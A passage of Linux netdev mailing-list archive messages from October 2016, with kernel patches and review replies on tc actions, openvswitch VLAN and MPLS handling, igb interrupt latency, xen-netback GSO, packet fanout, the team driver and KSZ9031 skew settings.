list_for_each_entry(a, &act_base, head) {
if (act->type == a->type || (strcmp(act->kind, a->kind) == 0)) {
write_unlock(&act_mod_lock);
+   unregister_pernet_subsys(ops);
return -EEXIST;
}
}
list_add_tail(&act->head, &act_base);
write_unlock(&act_mod_lock);
 
-   ret = register_pernet_subsys(ops);
-   if (ret) {
-   tcf_unregister_action(act, ops);
-   return ret;
-   }
-
return 0;
 }
 EXPORT_SYMBOL(tcf_register_action);
@@ -367,8 +366,6 @@ int tcf_unregister_action(struct tc_action_ops *act,
struct tc_action_ops *a;
int err = -ENOENT;
 
-   unregister_pernet_subsys(ops);
-
write_lock(&act_mod_lock);
list_for_each_entry(a, &act_base, head) {
if (a == act) {
@@ -378,6 +375,8 @@ int tcf_unregister_action(struct tc_action_ops *act,
}
}
write_unlock(&act_mod_lock);
+   if (!err)
+   unregister_pernet_subsys(ops);
return err;
 }
 EXPORT_SYMBOL(tcf_unregister_action);


Re: [PATCH] bluetooth.h: __ variants of u8 and friends are not neccessary inside kernel

2016-10-05 Thread Joe Perches
On Wed, 2016-10-05 at 13:14 +0200, Marcel Holtmann wrote:
> Hi Pavel,
> 
> > bluetooth.h is not part of user API, so __ variants are not neccessary
> > here.
> > 
> > Signed-off-by: Pavel Machek 
> > 
> > diff --git a/include/net/bluetooth/bluetooth.h 
> > b/include/net/bluetooth/bluetooth.h
[]
> > struct bt_skb_cb {
> > -   __u8 pkt_type;
> > -   __u8 force_active;
> > -   __u16 expect;
> > -   __u8 incoming:1;
> > +   u8 pkt_type;
> > +   u8 force_active;
> > +   u16 expect;
> > +   u8 incoming:1;
> > union {
> > struct l2cap_ctrl l2cap;
> > struct hci_ctrl hci;

trivia:

It's generally faster to use bool instead of u8 foo:1;



Re: [PATCH net-next v2 1/3] openvswitch: normalize vlan rx path

2016-10-05 Thread Eyal Birger
On Wed, Oct 5, 2016 at 8:23 PM, Jiri Benc  wrote:
> On Wed, 5 Oct 2016 17:18:08 +0300, Eyal Birger wrote:
>> I think at this point, 'eth' may point to a freed packet.
>
> It may but how does that matter? eth is not used beyond that point.

Definitely a nit. For sure not critical.

Just seemed less future safe to keep a pointer to an old packet lying around.

Eyal.


Re: [PATCH net-next v2 1/3] openvswitch: normalize vlan rx path

2016-10-05 Thread Jiri Benc
On Wed, 5 Oct 2016 17:18:08 +0300, Eyal Birger wrote:
> I think at this point, 'eth' may point to a freed packet.

It may but how does that matter? eth is not used beyond that point.

 Jiri


Re: Kernel 4.6.7-rt13: Intel Ethernet driver igb causes huge latencies in cyclictest

2016-10-05 Thread Julia Cartwright
On Wed, Oct 05, 2016 at 07:02:21AM +, Koehrer Mathias (ETAS/ESW5) wrote:
> Hi Julia,
> 
> > > In the meanwhile I have detected another finding which might be relevant:
> > >
> > > With the 3.18 kernel the igb driver comes with two interrupts per
> > > NIC (e.g. eth2 and eth2-TxRx0) with the 4.6. kernel the igb driver
> > > comes with 9 (!) interrupts per NIC: eth2, and eth2-TxRx-0,
> > > eth2-TxRx-1, ... , eth2-TxRx-7.
> > >
> > > As I have used initially the same kernel configuration from 3.18 also
> > > for the 4.6. kernel I wonder where this comes from and if there is any
> > > kernel option I may use to disable these many interrupts and to reduce
> > > it to 2 again.
> > 
> > If it's all of these interrupts that are firing and being handled at the 
> > same time, that
> > can account for the latencies you were seeing.  As I suggested before, 
> > having a
> > trace with the sched_wakeup event enabled can help confirm that it's these
> > interrupts causing problems.
> > 
> > If it is true, then the question is: why is the device triggering all of 
> > these interrupts all
> > at once?  Is that expected?  These are questions for netdev folks, I think.
> > 
> >Julia
> 
> OK - I ran again the cyclictest. This time I used the -C option:
> # cyclictest -a -i 100 -m -n -p 80 -t 1 -b 21 -C
> 
> And the last output lines of the trace are:
> cyclicte-58870d...2.. 1504647266us!: sched_switch: prev_comm=cyclictest 
> prev_pid=5887 prev_prio=19 prev_state=S ==> next_comm=kworker/0:0 next_pid=5 
> next_prio=120
> kworker/-5   0dN.h2.. 1504647372us : sched_wakeup: comm=cyclictest 
> pid=5887 prio=19 target_cpu=000
> kworker/-5   0dN.h3.. 1504647374us : sched_wakeup: comm=irq/54-eth2-TxR 
> pid=5883 prio=49 target_cpu=000
> kworker/-5   0dN.h3.. 1504647375us : sched_wakeup: comm=irq/53-eth2-TxR 
> pid=5882 prio=49 target_cpu=000
> kworker/-5   0dN.h3.. 1504647377us : sched_wakeup: comm=irq/52-eth2-TxR 
> pid=5881 prio=49 target_cpu=000
> kworker/-5   0dN.h3.. 1504647378us : sched_wakeup: comm=irq/51-eth2-TxR 
> pid=5880 prio=49 target_cpu=000
> kworker/-5   0dN.h3.. 1504647380us : sched_wakeup: comm=irq/50-eth2-TxR 
> pid=5879 prio=49 target_cpu=000
> kworker/-5   0dN.h3.. 1504647381us : sched_wakeup: comm=irq/49-eth2-TxR 
> pid=5878 prio=49 target_cpu=000
> kworker/-5   0dN.h3.. 1504647382us : sched_wakeup: comm=irq/48-eth2-TxR 
> pid=5877 prio=49 target_cpu=000
> kworker/-5   0dN.h3.. 1504647383us : sched_wakeup: comm=irq/47-eth2-TxR 
> pid=5876 prio=49 target_cpu=000
> kworker/-5   0d...2.. 1504647384us : sched_switch: prev_comm=kworker/0:0 
> prev_pid=5 prev_prio=120 prev_state=R+ ==> next_comm=cyclictest next_pid=5887 
> next_prio=19
> cyclicte-58870.11 1504647389us : tracing_mark_write: hit latency 
> threshold (28 > 21)
> 
> The attached trace-extract.gz shows some more lines.
> It actually looks to me as if the the many irq threads from igb are causing 
> the issue.

Yes, I think so.

Although, to be clear, it isn't the fact that there exists 8 threads,
it's that the device is firing all 8 interrupts at the same time.  The
time spent in hardirq context just waking up all 8 of those threads (and
the cyclictest wakeup) is enough to cause your regression.

netdev/igb folks-

Under what conditions should it be expected that the i350 trigger all of
the TxRx interrupts simultaneously?  Any ideas here?

See the start of this thread here:

  
http://lkml.kernel.org/r/d648628329bc446fa63b5e19d4d3f...@fe-mbx1012.de.bosch.com

   Julia


Re: [Xen-devel] [PATCH v2 net-next 2/7] xen-netback: retire guest rx side prefix GSO feature

2016-10-05 Thread Manuel Bouyer
On Wed, Oct 05, 2016 at 05:30:26PM +0200, Roger Pau Monné wrote:
> [...]
> Also, IIRC NetBSD doesn't have a Xen GSO implementation [1], but I would let 
> Manuel answer that one.

I confirm, we don't support GSO at this time.

-- 
Manuel Bouyer 
 NetBSD: 26 ans d'experience feront toujours la difference
--


Re: [Xen-devel] [PATCH v2 net-next 2/7] xen-netback: retire guest rx side prefix GSO feature

2016-10-05 Thread Roger Pau Monné
On Tue, Oct 04, 2016 at 10:24:04AM -0400, Konrad Rzeszutek Wilk wrote:
> On Tue, Oct 04, 2016 at 01:35:41PM +, Paul Durrant wrote:
> > > -Original Message-
> > > From: Konrad Rzeszutek Wilk [mailto:konrad.w...@oracle.com]
> > > Sent: 04 October 2016 13:52
> > > To: Paul Durrant ; annie...@oracle.com;
> > > joao.m.mart...@oracle.com
> > > Cc: netdev@vger.kernel.org; xen-de...@lists.xenproject.org; Wei Liu
> > > 
> > > Subject: Re: [Xen-devel] [PATCH v2 net-next 2/7] xen-netback: retire guest
> > > rx side prefix GSO feature
> > > 
> > > On Tue, Oct 04, 2016 at 10:29:13AM +0100, Paul Durrant wrote:
> > > > As far as I am aware only very old Windows network frontends make use
> > > > of this style of passing GSO packets from backend to frontend. These
> > > > frontends can easily be replaced by the freely available Xen Project
> > > > Windows PV network frontend, which uses the 'default' mechanism for
> > > > passing GSO packets, which is also used by all Linux frontends.
> > > 
> > > It is not that simple. Some companies have extra juice in their Windows
> > > frontends so can't easily swap over to the Xen Project one.
> > 
> > Ok, then those frontends will continue to work, but they won't get GSO 
> > packets any more. Prefix GSO has never been specified in the canonical 
> > netif header and so has been in a limbo state forever so such frontends 
> > have always been on borrowed time and only just happened to work against a 
> > linux backend. If someone wants to actually specify prefix GSO properly 
> > then it could be added back in, but it should not be necessary now that the 
> > RX side req<->rsp identity relation is documented 
> > (http://xenbits.xen.org/gitweb/?p=xen.git;a=blob;f=xen/include/public/io/netif.h;hb=HEAD#l729).
> > 
> > > 
> > > Either way CC-ing Annie
> > > 
> > > Also would it make sense to CC the FreeBSD and NetBSD maintainers of their
> > > PV drivers just to make sure? (Or has that been confirmed)
> > > 
> > 
> > I could do that, but I'd hope that they would be subscribed to xen-devel 
> > and will chime in if there's likely to be a problem.
> 
> Usually one CCs those folks. I think you are asking me to do
> the legwork and find them and CC them here?
> 
> CC-ing Roger and  Manuel Bouyer.

Thanks. FreeBSD is using the same method as current Linux in order to both 
send and receive GSO packets. That is using an extra slot in the ring, 
filled with a netif_extra_info of type XEN_NETIF_EXTRA_TYPE_GSO. Full code 
can be found here [0], but AFAICT FreeBSD is not using this prefix stuff.

Also, IIRC NetBSD doesn't have a Xen GSO implementation [1], but I would let 
Manuel answer that one.

Roger.

[0] http://fxr.watson.org/fxr/source/dev/xen/netfront/netfront.c
[1] https://github.com/jsonn/src/blob/trunk/sys/arch/xen/xen/if_xennet_xenbus.c


Re: [PATCH net-next v2 1/3] openvswitch: normalize vlan rx path

2016-10-05 Thread Eyal Birger
Hi,

On Wed, Oct 5, 2016 at 4:07 PM, Jiri Benc  wrote:
> diff --git a/net/openvswitch/datapath.c b/net/openvswitch/datapath.c
> index 4d67ea856067..c47b3da8ecf2 100644
> --- a/net/openvswitch/datapath.c
> +++ b/net/openvswitch/datapath.c
> @@ -594,6 +594,16 @@ static int ovs_packet_cmd_execute(struct sk_buff *skb, 
> struct genl_info *info)
> else
> packet->protocol = htons(ETH_P_802_2);
>
> +   if (eth_type_vlan(packet->protocol)) {
> +   __skb_pull(packet, ETH_HLEN);
> +   skb_reset_network_header(packet);
> +   skb_reset_mac_len(packet);
> +   packet = skb_vlan_untag(packet);
> +   if (unlikely(!packet))
> +   goto err;

I think at this point, 'eth' may point to a freed packet.
Maybe replace the 'eth' variable with a 'proto' variable caching the
value of eth_hdr(packet)->h_proto?

> +   skb_push(packet, ETH_HLEN);
> +   }
> +
> /* Set packet's mru */
> if (a[OVS_PACKET_ATTR_MRU]) {
> mru = nla_get_u16(a[OVS_PACKET_ATTR_MRU]);
> --
> 1.8.3.1
>

Eyal.


[PATCH net] packet: call fanout_release, while UNREGISTERING a netdev

2016-10-05 Thread Anoob Soman
If a socket has FANOUT sockopt set, a new proto_hook is registered
as part of fanout_add(). When processing a NETDEV_UNREGISTER event in
af_packet, __fanout_unlink is called for all sockets, but prot_hook which was
registered as part of fanout_add is not removed. Call fanout_release, on a
NETDEV_UNREGISTER, which removes prot_hook and removes fanout from the
fanout_list.

This fixes BUG_ON(!list_empty(&dev->ptype_specific)) in netdev_run_todo()

Signed-off-by: Anoob Soman 
---
 net/packet/af_packet.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
index 33a4697..11db0d6 100644
--- a/net/packet/af_packet.c
+++ b/net/packet/af_packet.c
@@ -3952,6 +3952,7 @@ static int packet_notifier(struct notifier_block *this,
}
if (msg == NETDEV_UNREGISTER) {
packet_cached_dev_reset(po);
+   fanout_release(sk);
po->ifindex = -1;
if (po->prot_hook.dev)
dev_put(po->prot_hook.dev);
-- 
2.7.4



Re: Intel Ethernet driver igb causes huge latencies with cyclictest (rt-tests)

2016-10-05 Thread Greg
On Wed, 2016-10-05 at 08:29 +, Koehrer Mathias (ETAS/ESW5) wrote:
> Hi all,
> 
> I noticed that with fairly new versions of the Linux kernel, the igb driver
> causes huge latencies with the cyclictest in a RT_PREEMPT environment.
> The root cause seems to be the number of interrupts that are used for the igb
> NIC devices as multiple of these irqs may occur at the same time (see below).
> 
> With the kernel 4.6.7-rt14 the igb uses 9 (!) irqs per NIC on an Intel Core 
> i7 PC (x86-64):
> E.g. eth2, and eth2-TxRx-0, eth2-TxRx-1, ... , eth2-TxRx-7.
> 
> Running the very same machine with kernel 3.18.27-rt27 there are only 2 irqs:
> eth2 and eth2-TxRx0
> 
> The issue with the many irqs is now that they are all fired roughly the same 
> time
> even if the link is down as nothing is connected to the NIC.
> I analyzed the execution of the cyclictest tool using the kernel tracer on 
> kernel 4.6.7-rt14:
> 
> kworker/-5   0dN.h2.. 1504647372us : sched_wakeup: comm=cyclictest 
> pid=5887 prio=19 target_cpu=000
> kworker/-5   0dN.h3.. 1504647374us : sched_wakeup: comm=irq/54-eth2-TxR 
> pid=5883 prio=49 target_cpu=000
> kworker/-5   0dN.h3.. 1504647375us : sched_wakeup: comm=irq/53-eth2-TxR 
> pid=5882 prio=49 target_cpu=000
> kworker/-5   0dN.h3.. 1504647377us : sched_wakeup: comm=irq/52-eth2-TxR 
> pid=5881 prio=49 target_cpu=000
> kworker/-5   0dN.h3.. 1504647378us : sched_wakeup: comm=irq/51-eth2-TxR 
> pid=5880 prio=49 target_cpu=000
> kworker/-5   0dN.h3.. 1504647380us : sched_wakeup: comm=irq/50-eth2-TxR 
> pid=5879 prio=49 target_cpu=000
> kworker/-5   0dN.h3.. 1504647381us : sched_wakeup: comm=irq/49-eth2-TxR 
> pid=5878 prio=49 target_cpu=000
> kworker/-5   0dN.h3.. 1504647382us : sched_wakeup: comm=irq/48-eth2-TxR 
> pid=5877 prio=49 target_cpu=000
> kworker/-5   0dN.h3.. 1504647383us : sched_wakeup: comm=irq/47-eth2-TxR 
> pid=5876 prio=49 target_cpu=000
> kworker/-5   0d...2.. 1504647384us : sched_switch: prev_comm=kworker/0:0 
> prev_pid=5 prev_prio=120 prev_state=R+ ==> next_comm=cyclictest next_pid=5887 
> next_prio=19
> 
> Here it can be clearly seen that eight irqs from the igb are coming in at the 
> same time.
> This leads to a fairly long phase of running in irq mode which hurts the real 
> time latency.
> 
> In my setup I have no cable connected to the eth2,
> I do a 
> # modprobe igb
> # ifconfig eth2 up 192.168.100.111
> 
> I did multiple tests with analyzing and modifying the igb driver.
> The function "igb_watchdog_task" seems to be the root cause of the issue.
> Whenever I disable this function the cyclictest shows great results.
> 
> There has been lengthy discussion on that topic on the rt-users mailing list:
> http://marc.info/?t=14745483663&r=1&w=2 
> 
> My question is now:
> How can I either use only 1 irq per NIC using the igb driver or how can 
> the driver be reorganized to let the watchdog task trigger the irqs 
> alternately.

Have you tried the ethtool channel command to reduce the number of
queues/channels?  I don't have an Intel part but I can do this with a
broadcom:

[root@galilei ~]# ethtool -l em1
Channel parameters for em1:
Pre-set maximums:
RX: 4
TX: 4
Other:  0
Combined:   0
Current hardware settings:
RX: 4
TX: 1
Other:  0
Combined:   0

[root@galilei ~]# grep em1 /proc/interrupts
 38: 16  2  2 145912  IR-PCI-MSI-edge
em1-tx-0
 39:  80893  29784  2  0  IR-PCI-MSI-edge
em1-rx-1
 40:  76123 281434  1  0  IR-PCI-MSI-edge
em1-rx-2
 41:  5  0 240184  0  IR-PCI-MSI-edge
em1-rx-3
 42:  2  1  0  16132  IR-PCI-MSI-edge
em1-rx-4

[root@galilei ~]# ethtool -L em1 rx 2 tx 2
[root@galilei ~]# grep em1 /proc/interrupts
 38:  2  0  0  0  IR-PCI-MSI-edge
em1-0
 39: 54  2  0  0  IR-PCI-MSI-edge
em1-txrx-1
 40: 71  0  1  0  IR-PCI-MSI-edge
em1-txrx-

Give it a try and see if it helps.

- Greg


> 
> Thanks for any feedback
> 
> Regards
> 
> Mathias




[PATCH] devicetree: net: micrel-ksz90x1.txt: Properly explain skew settings

2016-10-05 Thread Mike Looijmans
The KSZ9031 skew registers contain an offset, the chip's default value
is "neutral" which does not add any skew. Programming a 0 into a skew
property will actually set it the maximal negative adjustment and not
to a neutral position as one would expect.

Explain this situation in the devicetree binding documentation and list
the settings that the chip considers neutral.

Changing the implementation to accept negative values would have been
a better solution, but would break existing configurations.

Signed-off-by: Mike Looijmans 
---
 Documentation/devicetree/bindings/net/micrel-ksz90x1.txt | 7 ---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/Documentation/devicetree/bindings/net/micrel-ksz90x1.txt 
b/Documentation/devicetree/bindings/net/micrel-ksz90x1.txt
index f9c32ad..c35b5b4 100644
--- a/Documentation/devicetree/bindings/net/micrel-ksz90x1.txt
+++ b/Documentation/devicetree/bindings/net/micrel-ksz90x1.txt
@@ -34,16 +34,17 @@ KSZ9031:
 
   All skew control options are specified in picoseconds. The minimum
   value is 0, and the maximum is property-dependent. The increment
-  step is 60ps.
+  step is 60ps. The default value is the neutral setting, so setting
+  rxc-skew-ps=<0> actually results in -900 picoseconds adjustment.
 
   Optional properties:
 
-Maximum value of 1860:
+Maximum value of 1860, default value 900:
 
   - rxc-skew-ps : Skew control of RX clock pad
   - txc-skew-ps : Skew control of TX clock pad
 
-Maximum value of 900:
+Maximum value of 900, default value 420:
 
   - rxdv-skew-ps : Skew control of RX CTL pad
   - txen-skew-ps : Skew control of TX CTL pad
-- 
1.9.1



Re: [PATCH v2 net-next 0/2] bnx2x: page allocation failure

2016-10-05 Thread Jason Baron


On 10/03/2016 08:19 PM, David Miller wrote:
> From: "Baron, Jason" 
> Date: Mon, 3 Oct 2016 20:24:32 +
>
>> Or should I just send the incremental at this point?
> Incremental is required at this point.

Hi David,

Ok. The above question was sent out erroneously. I have already posted
the incremental patch that I was referring to here:
https://patchwork.ozlabs.org/patch/675227/

Prior to that incremental patch post, I had composed the above question,
but realized that the right thing to do was simply to send the
incremental. However, I forgot to delete the 'draft' mail that I had,
and it accidentally got sent out on Monday.

Please ignore the noise, we are all set here :)

Thanks,

-Jason


RE: [PATCH net-next v2 2/3] net: ethernet: mediatek: get hw lro capability by the chip id instead of by the dtsi

2016-10-05 Thread Nelson Chang
Hi Sergei, David,

I think modifying that as below is clear and scalable. Agree?

static bool mtk_is_hwlro_supported(struct mtk_eth *eth)
{
switch (eth->chip_id) {
case MT7623_ETH:
return true;
}

return false;
}

Thanks.


Nelson
-Original Message-
From: David Laight [mailto:david.lai...@aculab.com] 
Sent: Wednesday, October 05, 2016 9:07 PM
To: Nelson Chang (張家祥); sergei.shtyl...@cogentembedded.com;
j...@phrozen.org; da...@davemloft.net
Cc: n...@openwrt.org; netdev@vger.kernel.org;
linux-media...@lists.infradead.org; nelsonch...@gmail.com
Subject: RE: [PATCH net-next v2 2/3] net: ethernet: mediatek: get hw lro
capability by the chip id instead of by the dtsi

From: Nelson Chang
> Sent: 05 October 2016 13:46
> > +static bool mtk_is_hwlro_supported(struct mtk_eth *eth) {
> > + if (eth->chip_id == MT7623_ETH)
> > + return true;
> > + else
> > + return false;
> 
> return eth->chip_id == MT7623_ETH;
> 
> => Since there will be more chips support hw lro in the future, keep 
> the original codes to have the scalability like this:
> if (eth->chip_id == MT_ETH ||
> eth->chip_id == MT_ETH ||
> )
>   return true;

Nothing wrong with:

return eth->chip_id == MT_ETH ||
eth->chip_id == MT_ETH;

David





RE: [PATCH net-next v2 2/3] net: ethernet: mediatek: get hw lro capability by the chip id instead of by the dtsi

2016-10-05 Thread David Laight
From: Nelson Chang
> Sent: 05 October 2016 13:46
> > +static bool mtk_is_hwlro_supported(struct mtk_eth *eth) {
> > + if (eth->chip_id == MT7623_ETH)
> > + return true;
> > + else
> > + return false;
> 
> return eth->chip_id == MT7623_ETH;
> 
> => Since there will be more chips support hw lro in the future, keep the
> original codes to have the scalability like this:
> if (eth->chip_id == MT_ETH ||
> eth->chip_id == MT_ETH ||
> )
>   return true;

Nothing wrong with:

return eth->chip_id == MT_ETH ||
eth->chip_id == MT_ETH;

David



[PATCH net-next v2 3/3] openvswitch: fix vlan subtraction from packet length

2016-10-05 Thread Jiri Benc
When the packet has its vlan tag in skb->vlan_tci, the length of the VLAN
header is not counted in skb->len. It doesn't make sense to subtract it.

In addition, to honor the comment below the code, the VLAN header length
should not be subtracted if there's a vlan tag in skb->vlan_tci. This leads
to the code simply subtracting the Ethernet header length.

Signed-off-by: Jiri Benc 
---
 net/openvswitch/vport.c | 10 +++---
 1 file changed, 3 insertions(+), 7 deletions(-)

diff --git a/net/openvswitch/vport.c b/net/openvswitch/vport.c
index 8f198437c724..210bafc09bd8 100644
--- a/net/openvswitch/vport.c
+++ b/net/openvswitch/vport.c
@@ -483,17 +483,13 @@ EXPORT_SYMBOL_GPL(ovs_vport_deferred_free);
 
 static unsigned int packet_length(const struct sk_buff *skb)
 {
-   unsigned int length = skb->len - ETH_HLEN;
-
-   if (skb_vlan_tagged(skb))
-   length -= VLAN_HLEN;
-
/* Don't subtract for multiple VLAN tags. Most (all?) drivers allow
 * (ETH_LEN + VLAN_HLEN) in addition to the mtu value, but almost none
 * account for 802.1ad. e.g. is_skb_forwardable().
+* Note that the first VLAN tag is always in skb->vlan_tci, thus not
+* accounted for in skb->len.
 */
-
-   return length;
+   return skb->len - ETH_HLEN;
 }
 
 void ovs_vport_send(struct vport *vport, struct sk_buff *skb)
-- 
1.8.3.1



[PATCH net-next v2 0/3] openvswitch: make vlan handling consistent

2016-10-05 Thread Jiri Benc
Always keep the first vlan tag "accelerated", i.e. in skb->vlan_tci. This
simplifies things considerably.

v2: added the first patch

Jiri Benc (3):
  openvswitch: normalize vlan rx path
  openvswitch: remove unreachable code in vlan parsing
  openvswitch: fix vlan subtraction from packet length

 net/openvswitch/datapath.c | 10 ++
 net/openvswitch/flow.c | 28 
 net/openvswitch/vport.c| 10 +++---
 3 files changed, 21 insertions(+), 27 deletions(-)

-- 
1.8.3.1



[PATCH net-next v2 2/3] openvswitch: remove unreachable code in vlan parsing

2016-10-05 Thread Jiri Benc
Now when the first vlan tag is always in skb->vlan_tci, drop code that
assumed it might not be the case.

This patch also removes the wrong likely() statement around
skb_vlan_tag_present introduced by 018c1dda5ff1 ("openvswitch: 802.1AD Flow
handling, actions, vlan parsing, netlink attributes"). This code is called
whenever flow key is being extracted from the packet, the packet may be as
likely vlan tagged as not.

Signed-off-by: Jiri Benc 
---
 net/openvswitch/flow.c | 28 
 1 file changed, 8 insertions(+), 20 deletions(-)

diff --git a/net/openvswitch/flow.c b/net/openvswitch/flow.c
index c8c82e109c68..d88c0a55b783 100644
--- a/net/openvswitch/flow.c
+++ b/net/openvswitch/flow.c
@@ -308,9 +308,7 @@ static bool icmp6hdr_ok(struct sk_buff *skb)
 
 /**
  * Parse vlan tag from vlan header.
- * Returns ERROR on memory error.
- * Returns 0 if it encounters a non-vlan or incomplete packet.
- * Returns 1 after successfully parsing vlan tag.
+ * Returns ERROR on memory error, 0 otherwise.
  */
 static int parse_vlan_tag(struct sk_buff *skb, struct vlan_head *key_vh)
 {
@@ -331,34 +329,24 @@ static int parse_vlan_tag(struct sk_buff *skb, struct 
vlan_head *key_vh)
key_vh->tpid = vh->tpid;
 
__skb_pull(skb, sizeof(struct vlan_head));
-   return 1;
+   return 0;
 }
 
 static int parse_vlan(struct sk_buff *skb, struct sw_flow_key *key)
 {
-   int res;
-
key->eth.vlan.tci = 0;
key->eth.vlan.tpid = 0;
key->eth.cvlan.tci = 0;
key->eth.cvlan.tpid = 0;
 
-   if (likely(skb_vlan_tag_present(skb))) {
-   key->eth.vlan.tci = htons(skb->vlan_tci);
-   key->eth.vlan.tpid = skb->vlan_proto;
-   } else {
-   /* Parse outer vlan tag in the non-accelerated case. */
-   res = parse_vlan_tag(skb, &key->eth.vlan);
-   if (res <= 0)
-   return res;
-   }
+   if (!skb_vlan_tag_present(skb))
+   return 0;
 
-   /* Parse inner vlan tag. */
-   res = parse_vlan_tag(skb, &key->eth.cvlan);
-   if (res <= 0)
-   return res;
+   key->eth.vlan.tci = htons(skb->vlan_tci);
+   key->eth.vlan.tpid = skb->vlan_proto;
 
-   return 0;
+   /* Parse inner vlan tag. */
+   return parse_vlan_tag(skb, &key->eth.cvlan);
 }
 
 static __be16 parse_ethertype(struct sk_buff *skb)
-- 
1.8.3.1



[PATCH net] Fixing a bug in team driver due to incorrect 'unsigned int' to 'int' conversion

2016-10-05 Thread Alex Sidorenko
Roundrobin runner of team driver uses 'unsigned int' variable to count the 
number of sent_packets.
Later it is passed to a subroutine team_num_to_port_index(struct team *team, 
int num) as
'num' and when we reach MAXINT (2**31-1), 'num' becomes negative.

This leads to using incorrect hash-bucket for port lookup and as a result, 
packets are dropped. The fix
consists of changing 'int num' to 'unsigned int num'. Testing of a fixed kernel 
shows that there
is no packet drop anymore.


Signed-off-by: Alex Sidorenko 

---
 include/linux/if_team.h | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/include/linux/if_team.h b/include/linux/if_team.h
index 174f43f..c05216a 100644
--- a/include/linux/if_team.h
+++ b/include/linux/if_team.h
@@ -245,7 +245,7 @@ static inline struct team_port 
*team_get_port_by_index(struct team *team,
return NULL;
 }
 
-static inline int team_num_to_port_index(struct team *team, int num)
+static inline int team_num_to_port_index(struct team *team, unsigned int num)
 {
int en_port_count = ACCESS_ONCE(team->en_port_count);
 
-- 
2.7.4
 


-- 

--
Alex Sidorenko  email: a...@hpe.com
ERT  Linux  Hewlett-Packard Enterprise (Canada)
--


[PATCH net-next v2 1/3] openvswitch: normalize vlan rx path

2016-10-05 Thread Jiri Benc
Similarly to how the core networking stack behaves, let the first vlan tag
be always stored in skb->vlan_tci. This is already ensured in
__netif_receive_skb_core for packets that were received from the kernel and
honored by skb_vlan_push and skb_vlan_pop. The only remaining place are
packets received from the user space. Just do the same things with vlan
frames as __netif_receive_skb_core does.

Signed-off-by: Jiri Benc 
---
 net/openvswitch/datapath.c | 10 ++
 1 file changed, 10 insertions(+)

diff --git a/net/openvswitch/datapath.c b/net/openvswitch/datapath.c
index 4d67ea856067..c47b3da8ecf2 100644
--- a/net/openvswitch/datapath.c
+++ b/net/openvswitch/datapath.c
@@ -594,6 +594,16 @@ static int ovs_packet_cmd_execute(struct sk_buff *skb, 
struct genl_info *info)
else
packet->protocol = htons(ETH_P_802_2);
 
+   if (eth_type_vlan(packet->protocol)) {
+   __skb_pull(packet, ETH_HLEN);
+   skb_reset_network_header(packet);
+   skb_reset_mac_len(packet);
+   packet = skb_vlan_untag(packet);
+   if (unlikely(!packet))
+   goto err;
+   skb_push(packet, ETH_HLEN);
+   }
+
/* Set packet's mru */
if (a[OVS_PACKET_ATTR_MRU]) {
mru = nla_get_u16(a[OVS_PACKET_ATTR_MRU]);
-- 
1.8.3.1



[PATCH net-next v2] openvswitch: correctly fragment packet with mpls headers

2016-10-05 Thread Jiri Benc
If mpls headers were pushed to a defragmented packet, the refragmentation no
longer works correctly after 48d2ab609b6b ("net: mpls: Fixups for GSO"). The
network header has to be shifted after the mpls headers for the
fragmentation and restored afterwards.

Fixes: 48d2ab609b6b ("net: mpls: Fixups for GSO")
Signed-off-by: Jiri Benc 
---
v2: rewrite and restore the network header only for MPLS packets
---
 net/openvswitch/actions.c | 24 
 1 file changed, 20 insertions(+), 4 deletions(-)

diff --git a/net/openvswitch/actions.c b/net/openvswitch/actions.c
index 4e03f64709bc..1105c4e29c62 100644
--- a/net/openvswitch/actions.c
+++ b/net/openvswitch/actions.c
@@ -62,7 +62,8 @@ struct ovs_frag_data {
struct vport *vport;
struct ovs_skb_cb cb;
__be16 inner_protocol;
-   __u16 vlan_tci;
+   u16 network_offset; /* valid only for MPLS */
+   u16 vlan_tci;
__be16 vlan_proto;
unsigned int l2_len;
u8 l2_data[MAX_L2_LEN];
@@ -666,6 +667,12 @@ static int ovs_vport_output(struct net *net, struct sock 
*sk, struct sk_buff *sk
skb_postpush_rcsum(skb, skb->data, data->l2_len);
skb_reset_mac_header(skb);
 
+   if (eth_p_mpls(skb->protocol)) {
+   skb->inner_network_header = skb->network_header;
+   skb_set_network_header(skb, data->network_offset);
+   skb_reset_mac_len(skb);
+   }
+
ovs_vport_send(vport, skb);
return 0;
 }
@@ -684,7 +691,8 @@ static struct dst_ops ovs_dst_ops = {
 /* prepare_frag() is called once per (larger-than-MTU) frame; its inverse is
  * ovs_vport_output(), which is called once per fragmented packet.
  */
-static void prepare_frag(struct vport *vport, struct sk_buff *skb)
+static void prepare_frag(struct vport *vport, struct sk_buff *skb,
+u16 orig_network_offset)
 {
unsigned int hlen = skb_network_offset(skb);
struct ovs_frag_data *data;
@@ -694,6 +702,7 @@ static void prepare_frag(struct vport *vport, struct 
sk_buff *skb)
data->vport = vport;
data->cb = *OVS_CB(skb);
data->inner_protocol = skb->inner_protocol;
+   data->network_offset = orig_network_offset;
data->vlan_tci = skb->vlan_tci;
data->vlan_proto = skb->vlan_proto;
data->l2_len = hlen;
@@ -706,6 +715,13 @@ static void prepare_frag(struct vport *vport, struct 
sk_buff *skb)
 static void ovs_fragment(struct net *net, struct vport *vport,
 struct sk_buff *skb, u16 mru, __be16 ethertype)
 {
+   u16 orig_network_offset = 0;
+
+   if (eth_p_mpls(skb->protocol)) {
+   orig_network_offset = skb_network_offset(skb);
+   skb->network_header = skb->inner_network_header;
+   }
+
if (skb_network_offset(skb) > MAX_L2_LEN) {
OVS_NLERR(1, "L2 header too long to fragment");
goto err;
@@ -715,7 +731,7 @@ static void ovs_fragment(struct net *net, struct vport 
*vport,
struct dst_entry ovs_dst;
unsigned long orig_dst;
 
-   prepare_frag(vport, skb);
+   prepare_frag(vport, skb, orig_network_offset);
dst_init(&ovs_dst, &ovs_dst_ops, NULL, 1,
 DST_OBSOLETE_NONE, DST_NOCOUNT);
ovs_dst.dev = vport->dev;
@@ -735,7 +751,7 @@ static void ovs_fragment(struct net *net, struct vport 
*vport,
goto err;
}
 
-   prepare_frag(vport, skb);
+   prepare_frag(vport, skb, orig_network_offset);
memset(&ovs_rt, 0, sizeof(ovs_rt));
dst_init(&ovs_rt.dst, &ovs_dst_ops, NULL, 1,
 DST_OBSOLETE_NONE, DST_NOCOUNT);
-- 
1.8.3.1



Re: [PATCH net-next v2 2/3] net: ethernet: mediatek: get hw lro capability by the chip id instead of by the dtsi

2016-10-05 Thread Sergei Shtylyov

